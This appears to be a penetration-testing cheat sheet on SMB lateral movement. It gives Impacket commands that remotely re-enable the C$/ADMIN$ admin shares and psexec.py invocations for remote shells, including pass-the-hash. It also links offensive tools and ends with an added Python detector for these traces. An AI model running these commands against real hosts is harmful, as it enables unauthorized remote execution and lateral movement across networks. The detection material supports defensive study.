# SMB

Re-enable the default administrative shares (`C$` / `ADMIN$`) remotely with Impacket by setting `AutoShareServer` (server SKUs) and `AutoShareWks` (workstation SKUs) to `1` and restarting the Server service (`lanmanserver`):

```
$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareServer' -vt REG_DWORD -vd 1
$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareWks' -vt REG_DWORD -vd 1
$ services.py Administrator:'Passw0rd!'@192.168.1.11 stop -name lanmanserver
$ services.py Administrator:'Passw0rd!'@192.168.1.11 start -name lanmanserver
```

## Named Pipes

* <https://github.com/malcomvetter/CSExec>
* <https://v1k1ngfr.github.io/fuegoshell/>
* <https://github.com/v1k1ngfr/fuegoshell/>
* <https://github.com/trustedsec/The_Shelf/tree/main/POC/impacketremoteshell>
* <https://sensepost.com/blog/2025/pipetap-a-windows-named-pipe-proxy-tool/>
* <https://github.com/sensepost/pipetap>

### PsExec

* [https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec](https://web.archive.org/web/20220517171437/https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec)
* <https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm>
* <https://sensepost.com/blog/2025/psexecing-the-right-way-and-why-zero-trust-is-mandatory/>
* <https://github.com/sensepost/susinternals/blob/main/psexecsvc.py>
* <https://github.com/MaorSabag/impacket-jump>

#### psexec.py

```
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/snovvcrash@192.168.11.1 powershell
```
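Both procedures above (re-enabling `C$`/`ADMIN$` through the `LanmanServer\Parameters` values, and PsExec-style execution that installs a service whose binary is dropped into `ADMIN$`) leave host-side traces. The following is an added detection example, not code from the original page or from Impacket: it runs two rules over constructed sample events whose field names (`target_object`, `details`, `service_name`, `image_path`) are an assumption loosely modelled on Sysmon Event ID 13 and System Event ID 7045, and the "service binary directly in the Windows root" rule is a heuristic of my own, not a documented indicator.

```python
"""Flag registry changes to the AutoShare* values and PsExec-style service installs.
Added example; the event records below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


# The two values the reg.py commands above set to 1 (AutoShareServer: server SKUs,
# AutoShareWks: workstation SKUs). Sysmon EID 13 reports the full path in TargetObject.
AUTOSHARE_RE = re.compile(
    r"\\Services\\LanmanServer\\Parameters\\(AutoShareServer|AutoShareWks)$", re.IGNORECASE)

# Heuristic (assumption): a service binary sitting directly in the Windows root, which is
# the directory ADMIN$ maps to, is unusual; legitimate services live under System32 or
# Program Files. Sysinternals PsExec drops PSEXESVC.exe there; psexec.py drops a random name.
ADMIN_SHARE_DROP_RE = re.compile(
    r'^"?(%SystemRoot%|%windir%|[A-Za-z]:\\Windows)\\[^\\]+\.exe"?', re.IGNORECASE)
KNOWN_PSEXEC_SERVICES = {"psexesvc"}

# Constructed sample events (field names are an assumption, see lead-in).
SAMPLE_EVENTS = [
    {"source": "Sysmon", "event_id": 13, "host": "FS01",
     "target_object": r"HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer",
     "details": "DWORD (0x00000001)", "image": r"C:\Windows\System32\svchost.exe"},
    {"source": "Sysmon", "event_id": 13, "host": "FS01",
     "target_object": r"HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareWks",
     "details": "DWORD (0x00000001)", "image": r"C:\Windows\System32\svchost.exe"},
    {"source": "System", "event_id": 7036, "host": "FS01", "service_name": "Server", "state": "running"},
    {"source": "System", "event_id": 7045, "host": "FS01", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"source": "System", "event_id": 7045, "host": "FS01", "service_name": "hYtrEw",
     "image_path": r"%SystemRoot%\wXqAbR.exe", "account": "LocalSystem"},
    {"source": "System", "event_id": 7045, "host": "WS07", "service_name": "ExampleAgent",
     "image_path": r'"C:\Program Files\ExampleVendor\agent.exe"', "account": "LocalSystem"},
    {"source": "Sysmon", "event_id": 13, "host": "WS07",
     "target_object": r"HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Size",
     "details": "DWORD (0x00000003)", "image": r"C:\Windows\regedit.exe"},
]


def check_registry(ev):
    """Sysmon EID 13: was one of the AutoShare* values written?"""
    m = AUTOSHARE_RE.search(ev.get("target_object", ""))
    if not m:
        return None
    return Finding(ev["host"], "autoshare-modified",
                   f"{m.group(1)} set to {ev.get('details', '?')} by {ev.get('image', '?')}")


def check_service_install(ev):
    """System EID 7045: known PsExec service name, or binary dropped into the Windows root."""
    name = ev.get("service_name", "")
    path = ev.get("image_path", "")
    if name.lower() in KNOWN_PSEXEC_SERVICES:
        return Finding(ev["host"], "psexec-service", f"service {name} installed from {path}")
    if ADMIN_SHARE_DROP_RE.match(path):
        return Finding(ev["host"], "service-binary-in-windows-root", f"service {name} runs {path}")
    return None


def detect(events):
    """Run both rules over a list of event dicts and return the findings in order."""
    findings = []
    for ev in events:
        if ev["source"] == "Sysmon" and ev["event_id"] == 13:
            f = check_registry(ev)
        elif ev["source"] == "System" and ev["event_id"] == 7045:
            f = check_service_install(ev)
        else:
            f = None
        if f:
            findings.append(f)
    return findings


def hosts_with_shares_reenabled(findings):
    """Hosts where both values were touched, i.e. the two-step reg.py sequence shown above."""
    seen = {}
    for f in findings:
        if f.rule == "autoshare-modified":
            seen.setdefault(f.host, set()).add(f.detail.split()[0].lower())
    return sorted(h for h, vals in seen.items() if {"autoshareserver", "autosharewks"} <= vals)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host:6} {f.rule:32} {f.detail}")
    print("shares re-enabled on:", hosts_with_shares_reenabled(SAMPLE_EVENTS and found))
```

On the sample set this yields four findings (two registry writes on FS01, the `PSEXESVC` install, and the random-named service whose binary sits in `%SystemRoot%`), and FS01 is the only host where both AutoShare values were changed; the unrelated `Size` value and the agent under Program Files are ignored. In a real pipeline the two rules are worth correlating with the SMB session that preceded them (the remote registry and SCM calls arrive over `IPC$` named pipes), which is what links these host events back to the source address.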
